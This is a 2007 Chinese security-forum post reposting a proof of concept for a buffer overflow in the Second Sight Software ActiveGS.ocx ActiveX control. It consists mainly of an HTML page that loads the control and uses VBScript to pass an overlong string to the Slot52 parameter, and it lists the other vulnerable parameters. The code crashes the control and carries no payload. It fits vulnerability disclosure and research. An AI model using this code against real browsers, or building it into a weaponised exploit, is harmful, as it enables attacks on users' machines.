‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC

ring04h

团队执行官

Rank: 8Rank: 8

E.S.T核心成员 社区主管

帖子
3923 
精华
128 
积分
209640 
阅读权限
200 
性别
男 
在线时间
1095 小时 
注册时间
2007-10-23 
最后登录
2008-7-18 

资料收集奖 运营支持奖

楼主 发表于 2007-4-25 01:01  只看该作者

Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC

复制内容到剪贴板
代码:
<!--

===============================================================================================
            Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC
                      By Umesh Wanve
==============================================================================================  
   
Date : 24-04-2007

Tested on Windows 2000 SP4 Server English
      Windows 2000 SP4 Professional English
  
Reference: [url]http://www.securityfocus.com/bid/23554[/url]

Vendor: [url]http://www.freetoolsassociation.com[/url]
     [url]http://www.freetoolsassociation.com/fta/activegs/activegs.cab[/url]


Desc: Many parameters of CLSID 052DF14F-6F28-44A0-9130-294FDA6176EB are vulnerable. This activex gives error like,
   Buffer Overrun detected. This is complied with /GS flag. The all vulnerable parameters are
    Slot51,Slot52,Slot61,Slot62,Slot7,Slot71,Slot72.

PS. This was written for educational purpose. Use it at your own risk.Author will be not be
   responsible for any damage.

Always thanks to Metasploit and Stroke.

-->


<html>

<title>
Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC- By Umesh Wanve
</title>

<body>
<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:052DF14F-6F28-44A0-9130-294FDA6176EB" > </OBJECT>

<script language="vbscript">
targetFile = "C:\Research\activegs\ActiveGS.ocx"
prototype = "Invoke_Unknown Slot52 As String"
memberName = "Slot52"
progid   = "ActiveGSLib.ActiveGS"
argCount  = 1

arg1=String(940, "A")

target.Slot52 = arg1


</script>

</body>

</html>

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题